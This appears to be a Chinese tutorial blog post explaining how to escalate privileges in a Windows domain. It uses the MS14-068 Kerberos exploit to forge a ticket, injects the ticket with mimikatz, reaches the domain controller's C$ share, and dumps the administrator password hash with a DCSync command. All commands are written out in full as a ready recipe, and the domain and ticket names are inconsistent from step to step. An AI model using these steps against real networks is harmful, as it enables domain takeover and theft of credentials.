域客户机提权获取域hash值

总步骤:
将mimikatz和14068漏洞放到客户机上,打开cmd输入whoami /all查看SID号,再输入14068py.exe -u test@hack.com -p “123.com” -s SID号 -d dc1.contoso.com获取TGT_kim@contoso.com.ccache,然后输入klist purge清除所有的票据,然后输入mimikatz.exe “kerberos::ptc TGT_jperesam@sctusr.sctdom.gob.mx.ccache” exit获取票据,然后就可以dir \dc\c$连接上dc,达到提权目的,在输入mimikatz.exe,输入lsadump::dcsync /domain:hack.com /user:administrator /csv获取域hash值。
一.将mimikatz和14068漏洞放到客户机上,打开cmd输入whoami /all查看SID号。

在这里插入图片描述二.再输入14068py.exe -u test@hack.com -p “123.com” -s SID号 -d dc1.contoso.com获取TGT_kim@contoso.com.ccache
在这里插入图片描述三.然后输入klist purge清除所有的票据
在这里插入图片描述四.再输入mimikatz.exe “kerberos::ptc 你刚刚获取的票据名字” exit获取票据
在这里插入图片描述五. 然后就可以dir \域管计算机名\c$连接上dc,达到提权目的,在输入mimikatz.exe,输入lsadump::dcsync /domain:hack.com /user:administrator /csv获取域管hash值,或者可以更改administrator获取其他用户的hash值。
在这里插入图片描述在这里插入图片描述
配合“内网渗透的域控制命令”链接使用更方便哦

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值